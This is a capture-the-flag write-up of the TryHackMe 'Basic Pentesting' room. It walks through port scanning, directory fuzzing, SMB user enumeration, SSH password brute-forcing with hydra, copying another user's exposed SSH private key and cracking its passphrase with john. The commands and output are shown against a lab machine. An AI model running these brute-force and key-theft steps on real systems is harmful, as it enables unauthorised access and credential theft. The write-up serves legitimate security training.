Basic Pentesting THM cover image

Solving Basic Pentesting – TryHackMe Challenge Writeup

by

CTF Writeups & Bug Bounty » Try Hack Me » THM Challenges » Solving Basic Pentesting – TryHackMe Challenge Writeup

This post provides a full walkthrough of the TryHackMe challenge called Basic Pentesting. We will scan open ports, enumerate the web app directories, retrieve SMB usernames, brute-force a SSH access, and finally brute-force the SSH private key of another user on the system for the privilege escalation.

» Link to the room on TryHackMe

Table of Contents

Introduction – Basic Pentesting

According to the TryHackMe description, Basic Pentesting is a challenge that allows us to “practise web app hacking and privilege escalation“.

We are going to learn brute forcing, hash cracking, service enumeration and Linux Enumeration.

We are guided and have to answer 8 different questions, from the initial enumeration to the privilege escalation.

It’s an easy challenge, so let’s get started!

We are going to solve it question by question.

Find the services exposed by the machine

OK, so let’s start with the usual nmap scan:

nmap -sS -T5 -p- -Pn --disable-arp-ping 10.80.136.170
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

nmap options:

  • -sS: TCP SYN scan method
  • -T5: limits the delay to 5ms per port
  • -p-: scans all ports (from 1 to 65535)
  • -Pn –disable-arp-ping: disables the ICMP packets sent by default by nmap to the target

So 3 different services are detected: SSH, HTTP and SMB (ports 139 and 445).

Well, that’s all for the first question. Let’s switch to the website enumeration.

What is the name of the hidden directory on the web server?

For this question, we are going to enumerate (brute force) the directories of the web app.

Let’s use ffuf for this task, it’s a quick and polyvalent tool: 

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u "http://10.80.136.170/FUZZ" -mc all -fc 404 -r -ic -s
.hta
.htaccess
.htpasswd
de*********
index.html
server-status

ffuf options:

  • -w: wordlist used
  • -u: target URL
  • -mc all -fc 404: keeps all responses except for 404 NOT FOUND
  • -r: follows redirections
  • -ic: ignores comments in the wordlist
  • -s: silent mode

The hidden directory is de********* (hidden so you have to do it yourself and learn!)

User brute-forcing to find the username & password

Our next task is to retrieve username and passwords through brute-forcing.

We have the choice between SMB and SSH services, and we are going to choose SMB as we can probably enumerate users.

Let’s enumerate the SMB service using enum4linux: 

enum4linux -a 10.80.136.170
[...]
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)

Ok, so 3 local users were retrieved: kay, jan and ubuntu.

Let’s have a look at the next 2 questions:

What is the username? What is the password?

The username answer syntax is ***, so the valid username must be 3 characters long. It’s either kay or jan.

The password syntax is *******, so the valid password must be 7 characters long. Let’s extract all the 7-character-long passwords from a password wordlist:

grep -oE '\b.{7}\b' /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-10000.txt > /tmp/passwords

grep options:

  • -o: only keeps what matches the regular expression
  • -E: regular expression used
  • ‘\b.{7}\b’: any set of 7 characters between 2 word delimiters

So our potential passwords are stored in /tmp/passwords and the usernames are either kay or jan.

With this knowledge, we are able to bruteforce the SSH service using hydra:

hydra -l jan -P /tmp/passwords ssh://10.80.136.170/
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-11 08:35:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1771 login tries (l:1/p:1771), ~111 tries per task
[DATA] attacking ssh://10.80.136.170:22/
[STATUS] 168.00 tries/min, 168 tries in 00:01h, 1609 to do in 00:10h, 16 active
[STATUS] 114.00 tries/min, 342 tries in 00:03h, 1435 to do in 00:13h, 16 active
[STATUS] 106.71 tries/min, 747 tries in 00:07h, 1030 to do in 00:10h, 16 active
[STATUS] 108.50 tries/min, 1302 tries in 00:12h, 475 to do in 00:05h, 16 active
[22][ssh] host: 10.80.136.170   login: jan   password: arm****

hydra options:

  • -l: login to use
  • -P: passwords wordlist to use

Nice! After roughly 15 minutes, the credentials are found: the username is jan and password is arm**** (I challenge you to find it!).

I launched the command with jan, it was a coin toss 😉

So we know both the username and the password. Let’s switch to the next questions, shall we?

What service do you use to access the server (answer in abbreviation in all caps)?

Well, the service we use to access the server is SSH. I can’t really hide this answer from you 😉

Let’s go directly to privilege escalation.

Enumerate the machine to find any vectors for privilege escalation

OK, so first things first, we have to log in through SSH to the target with the jan account:

ssh jan@10.80.136.170

Now, it’s time to enumerate.

Readable SSH private key

We quickly find a readable SSH private key in the home directory of the other user kay:

jan@ip-10-80-136-170:~$ cd /home/kay
jan@ip-10-80-136-170:/home/kay$ ls -lA
total 40
-rw------- 1 kay  kay  789 Jun 22  2025 .bash_history
-rw-r--r-- 1 kay  kay  220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay 3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay 4096 Apr 17  2018 .cache
-rw------- 1 root kay  119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay 4096 Apr 23  2018 .nano
-rw------- 1 kay  kay   57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay  655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay 4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay    0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay  538 Apr 23  2018 .viminfo
jan@ip-10-80-136-170:/home/kay$ cd .ssh
jan@ip-10-80-136-170:/home/kay/.ssh$ ls -lA
total 12
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub

This is very bad: anyone with the SSH private key can log in as kay to the system, without providing a password (unless if the private key is protected by a password).

Let’s copy this private key to our machine using scp:

root@ip-10-80-146-197:~# scp jan@10.80.136.170:/home/kay/.ssh/id_rsa /tmp/id_rsa
jan@10.80.136.170's password: 
id_rsa                                        100% 3326     4.3MB/s   00:00    
root@ip-10-80-146-197:~# chmod 600 /tmp/id_rsa

Now, let’s try to log in with this private key:

root@ip-10-80-146-197:~# ssh -i /tmp/id_rsa kay@10.80.136.170
Enter passphrase for key '/tmp/id_rsa':

Oops, the private key is protected by a password. Whatever, we can try to brute-force it!

Cracking the SSH private key

To have a hash format that john can understand, we need to use a john tool called ssh2john to transform our private key into a hash:

root@ip-10-80-146-197:~# python3 /opt/john/ssh2john.py /tmp/id_rsa > /tmp/id_rsa.hash

Now, we can launch john with the default wordlist rockyou.txt and the previous hash:

# john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/id_rsa.hash
[...]
be*****          (/tmp/id_rsa)

Great, the password was very quickly found!

We are now able to connect to the target with the kay account using the command ssh -i /tmp/id_rsa kay@10.80.136.170 and providing this password.

What is the name of the other user you found( all lower case)?

Before moving on to the final question, the answer to this one is obviously kay.

What is the final password you obtain?

Once we are connected as kay on the target, we can read a clear password in the home directory:

kay@ip-10-80-136-170:~$ ls -lA
total 40
-rw------- 1 kay  kay  789 Jun 22  2025 .bash_history
-rw-r--r-- 1 kay  kay  220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay 3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay 4096 Apr 17  2018 .cache
-rw------- 1 root kay  119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay 4096 Apr 23  2018 .nano
-rw------- 1 kay  kay   57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay  655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay 4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay    0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay  538 Apr 23  2018 .viminfo
kay@ip-10-80-136-170:~$ cat pass.bak
heresareallystrongpass************************************

The final password we obtain is heresareallystrongpass******************************.

That’s the end of the challenge!

Final Thoughts – Basic Pentesting

This was a fun challenge, involving port scan, enumeration and brute-forcing, on 3 different services.

I encourage you to solve it yourself and only look at my writeups when you are stuck.

Flags are hidden (for the most part), it’s not to be annoying but to encourage you into learning and becoming better.

Read more THM Writeups on pentestguides.com:

Disclaimer

This article is provided for educational purposes only.

All techniques demonstrated were performed in a controlled lab environment.

Do not attempt to reproduce these actions on systems you do not own or have explicit authorization to test.

I do not encourage or take responsibility for any illegal use of the information provided.

Leave a Comment